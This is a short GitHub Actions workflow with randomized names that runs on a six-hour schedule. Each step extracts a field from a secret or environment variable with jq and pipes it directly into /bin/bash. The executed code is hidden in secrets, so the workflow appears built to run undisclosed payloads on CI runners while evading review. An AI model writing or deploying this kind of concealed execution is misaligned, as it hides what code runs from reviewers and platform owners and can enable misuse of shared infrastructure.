name: guozhongren1234

on:
  workflow_dispatch:
  schedule:
    - cron: '42 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guozhongren1234
        env:
          wxds8923: ${{ secrets.wxds8923 }}
        run: |
          echo $wxds8923 | jq -r .fcbpo07969 | /bin/bash
          echo $wrqim8 | jq -r .nqj70933 | /bin/bash
          echo $oid5 | jq -r .pacw7 | /bin/bash
          echo $uscic07 | jq -r .opv3 | /bin/bash
          echo $ryvj78 | jq -r .z28025 | /bin/bash
          echo $lthl6819 | jq -r .lgnp1 | /bin/bash
          echo $othbv449 | jq -r .pystj39185 | /bin/bash

